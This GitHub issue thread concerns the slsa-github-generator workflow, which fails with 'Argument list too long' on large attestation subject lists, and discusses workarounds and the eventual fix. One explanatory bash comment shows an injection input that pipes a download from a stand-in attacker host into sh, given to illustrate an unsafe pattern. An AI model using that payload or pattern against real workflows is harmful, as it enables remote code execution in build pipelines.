[bug] Alternative ways required to pass large attestation subjects
Describe the bug
For complex projects that include multiple modules or packages, the number of subjects and the size of base64-subjects can easily grow larger than the allowed size of command-line arguments and environment strings. For example, the subject hashes in a project I tried recently add up to about 200 KB, which results in the following error when the generator tries to pass them as a command-line argument.
Error: An error occurred trying to start process '/usr/bin/bash' with working directory '/home/runner/work/x'. Argument list too long
To get around that, the possible solutions require making changes to the GH runner, which is probably not a good idea.
Would it be possible to pass the subjects in a different way, rather than as an environment string through a command-line argument as done here?
Additional context
- The documentation of the kernel call execve(), in the section "Limits on size of arguments and environment", is helpful.
- Here is another related question on Stack Overflow.
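For reference, the limits involved can be inspected on a Linux runner like this (a sketch; exact values depend on the kernel and configured stack size):

```bash
# Total budget for argv plus the environment (ARG_MAX), typically ~2 MB on Linux.
getconf ARG_MAX

# GNU xargs reports the effective limits it will use when building command lines.
xargs --show-limits < /dev/null

# Note: Linux additionally caps each single argument or environment string at
# MAX_ARG_STRLEN (32 pages, i.e. 128 KiB on typical x86-64 kernels), so a ~200 KB
# base64-subjects value fails even though the total ARG_MAX budget would allow it.
```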
Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.
Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?
> Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.
The subjects and their hashes would still need to be computed by a build job as the file names can change if they include version numbers, etc. I was wondering if it would be possible to avoid passing inputs.base64-subjects as an argument string by storing it in a file. That way the builder could read the subjects directly from the file and the issue would be resolved I think.
> Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?
It was just the number of subjects. There were several metadata files and docs for each artifact.
> Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.
>
> The subjects and their hashes would still need to be computed by a build job as the file names can change if they include version numbers, etc. I was wondering if it would be possible to avoid passing inputs.base64-subjects as an argument string by storing it in a file. That way the builder could read the subjects directly from the file and the issue would be resolved I think.
Yeah, I responded without thinking about that bit. Unfortunately, the user's build job(s) and the SLSA generator job(s) are necessarily separate, so you can't just pass a path to read or something. You could, however, upload a file containing the subjects and hashes to the workflow run using actions/upload-artifact and the reusable workflow could download it.
This would complicate the use of the workflow a bit because users would need to call actions/upload-artifact first to upload the file but it might be unavoidable for large subject lists.
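To illustrate the shape of that approach (only a sketch; the file names and the digest hand-off below are assumptions, not an existing interface of the generator), the build job would write the subject list to a file, upload it with actions/upload-artifact, and pass only a small fingerprint between jobs:

```bash
# Build job (sketch): record "sha256  filename" lines for every produced artifact.
sha256sum dist/* > subjects.sha256

# Expose only a short digest of that file as a job output, so the generator job
# can check that the artifact it later downloads has not been tampered with; the
# file itself would be uploaded with actions/upload-artifact in a following step.
echo "subjects-digest=$(sha256sum subjects.sha256 | awk '{print $1}')" >> "$GITHUB_OUTPUT"
```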
> Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?
>
> It was just the number of subjects. There were several metadata files and docs for each artifact.
So for each artifact there are docs files and metadata files? What kind of files were they? Are the metadata files and docs generated by the build process?
If they are all generated by a single set of build steps then I think it might make sense to have a single SLSA provenance doc, but I wonder if it should be broken up and several provenance docs should be created.
> Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.
>
> The subjects and their hashes would still need to be computed by a build job as the file names can change if they include version numbers, etc. I was wondering if it would be possible to avoid passing inputs.base64-subjects as an argument string by storing it in a file. That way the builder could read the subjects directly from the file and the issue would be resolved I think.
>
> Yeah, I responded without thinking about that bit. Unfortunately, the user's build job(s) and the SLSA generator job(s) are necessarily separate, so you can't just pass a path to read or something. You could, however, upload a file containing the subjects and hashes to the workflow run using actions/upload-artifact and the reusable workflow could download it.
>
> This would complicate the use of the workflow a bit because users would need to call actions/upload-artifact first to upload the file but it might be unavoidable for large subject lists.
I'm still thinking of keeping the workflow as it is, i.e., users would provide inputs.base64-subjects as the output of the build job. The idea would be to store the input in a file instead of an env variable in the generator workflow itself, to avoid passing it as an argument string. Of course that would be limited to the maximum size of a GH job output, but in my case that was not an issue.
> Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?
>
> It was just the number of subjects. There were several metadata files and docs for each artifact.
>
> So for each artifact there are docs files and metadata files? What kind of files were they? Are the metadata files and docs generated by the build process?
>
> If they are all generated by a single set of build steps then I think it might make sense to have a single SLSA provenance doc, but I wonder if it should be broken up and several provenance docs should be created.
All the files, including the docs, are created in a single build step in my use case. Example metadata files are the md5, sha256, and sha512 of the artifacts, POM files, the SBOM, etc.
@behnazh-w I suppose there's no way for you to split the builds into smaller ones?
One idea, as has been suggested, is to add a new file option and have users upload the file:
subjects-filename: "./path/to/file"
base64-subjects-filename-digest: "base64 output of sha256sum ./path/to/file"
Most users would keep the current option, and only users who hit the size limits would use the second option. WDYT?
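To make the second option concrete (a sketch; these input names are only proposed above, and whether the digest covers the raw hash or the full sha256sum output line is an assumption), the caller could compute the digest like this:

```bash
# Hypothetical computation of the proposed base64-subjects-filename-digest input:
# take the sha256sum output of the subjects file and base64-encode it.
digest="$(sha256sum ./path/to/file | base64 -w0)"
echo "digest is ${digest}"
```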
> @behnazh-w I suppose there's no way for you to split the builds into smaller ones?
No, I can't split the build.
> One idea, as has been suggested, is to add a new file option and have users upload the file:
>
> subjects-filename: "./path/to/file"
> base64-subjects-filename-digest: "base64 output of sha256sum ./path/to/file"
>
> Most users would keep the current option, and only users who hit the size limits would use the second option. WDYT?
Initially I was thinking of keeping the current option as it is and passing the subjects to the builder binary in a file, by reading them from the build job output like this:
echo "${{ needs.build.outputs.hashes }}" > subjects-file
./"$BUILDER_BINARY" attest --subjects subjects-file -g "$UNTRUSTED_ATTESTATION_NAME"
But after thinking some more, passing such a large value as a job output is not a good idea in general and might slow down the GHA runs. So using a new file option as suggested sounds good to me.
> Error: An error occurred trying to start process '/usr/bin/bash' with working directory '/home/runner/work/x'. Argument list too long
>
> Additional context
>
> - The documentation of the kernel call execve(), in the section "Limits on size of arguments and environment", is helpful.
> - Here is another related question on Stack Overflow.
I see. We are getting this error currently not because GitHub complains about the size of the input, but because the argument is too long on the command line. If that's the case, we could write the input to a temporary file and pass the file to the generator binary without changing the workflow inputs, and callers of the workflow would be unchanged.
Though there would be a problem with escaping the input as we can't use environment variables due to the length. We would need to figure out a way to prevent script injection without using environment variables.
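For context on why the environment variable matters for injection (an illustrative sketch, not the generator's actual code): when the untrusted input reaches the script through `env:`, bash only ever sees it as data, whereas substituting `${{ ... }}` directly into the script text lets a crafted value run as code.

```bash
# Safe: UNTRUSTED_SUBJECTS is set from the workflow input via `env:`, so the
# expansion happens outside the shell and the value is written out verbatim.
printf '%s' "$UNTRUSTED_SUBJECTS" > subjects-file

# Unsafe (the pattern to avoid if env vars can't be used because of the length):
#   echo "${{ inputs.base64-subjects }}" > subjects-file
# An input such as  "; curl https://attacker.example/x | sh; "  would then be
# executed by bash instead of being treated as data.
```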
@ianlewis @laurentsimon We are hitting this problem in production now: https://github.com/micronaut-projects/micronaut-oracle-cloud/actions/runs/5017226257/jobs/8996007716#step:3:255
As a quick fix, is it possible to store the input in a file instead of an env variable in the generator workflow to avoid passing it as an argument string?
echo "${{ needs.build.outputs.hashes }}" > subjects-file
./"$BUILDER_BINARY" attest --subjects subjects-file -g "$UNTRUSTED_ATTESTATION_NAME"
Yes, I think that should be doable. I think we discussed this a while ago. @ianlewis no side effects I'm missing, right?
I think we need to implement https://github.com/slsa-framework/slsa-github-generator/issues/845#issuecomment-1243865527. For the sha256 of the file content, we either let users call sha256sum themselves, or we make a public version of the secure-upload Action https://github.com/slsa-framework/slsa-github-generator/tree/main/.github/actions/secure-upload-artifact
We also need to take care of the fact that the filename should be the basename(path), I think.
We can't save the input into a file because to do so, we need to echo <value> but the value is too large. It may also be failing at the time we're setting the env variable.
Limits: https://www.in-ulm.de/~mascheck/various/argmax/
Right. The problem is occurring here when GHA invokes bash to run the script and not when the script is executing the builder binary itself.
An error occurred trying to start process '/usr/bin/bash' with working directory '/home/runner/work/micronaut-oracle-cloud/micronaut-oracle-cloud'. Argument list too long
If it's an input, we can't really avoid putting it in an environment variable because of https://github.com/slsa-framework/slsa-github-generator/issues/845#issuecomment-1273900126
It's a bit messy from a usability standpoint, but I think the upload/download solution is currently the only known solution that would work.
> We can't save the input into a file because to do so, we need to echo <value> but the value is too large. It may also be failing at the time we're setting the env variable.
That's true considering the size limit for bash command arguments, although in the same workflow the same value is passed to echo for debugging purposes and it didn't cause an issue. In case you're curious, I have left that line in to see whether GitHub keeps masking the output due to secrets being present in the step, but that's a separate issue.
> I think the upload/download solution is currently the only known solution that would work.
It sounds good.
Is there a timeline for adding secure upload/download to fix this issue?
I think we can aim for the first half of July. Would it be OK on your side? If you need it earlier, I could give you some hints. Let me know.
> I think we can aim for the first half of July. Would it be OK on your side? If you need it earlier, I could give you some hints. Let me know.
Yes, that would work. As a temporary fix I have removed .module, -sources.jar and -javadoc.jar artifacts, but would definitely like to add them back when this is fixed. Thanks!
Re-opening until we have e2e tests for this.
@behnazh-w can you verify that https://github.com/slsa-framework/slsa-github-generator/pull/2365 fixes the issue? You need to reference the builder at main to test. How many subjects caused the problem in your experience?
@laurentsimon Please also add a note about this feature to the CHANGELOG
Thanks for the new feature. I tested the builder at main against 1851 subjects and it works. The original failing pipeline was generating 703 subjects.
Thanks for the info. I'll create the e2e tests with 2k subjects then.
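For reference, a subject list of that size can be generated for a test along these lines (a sketch; the file names and count are arbitrary):

```bash
# Create 2000 dummy artifacts and build a base64-encoded subject list,
# which comfortably exceeds the ~128 KiB single-argument limit.
mkdir -p out
for i in $(seq 1 2000); do
  echo "content $i" > "out/artifact-$i.txt"
done
(cd out && sha256sum artifact-*.txt) | base64 -w0 > subjects.base64
wc -c subjects.base64
```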
Closing this issue then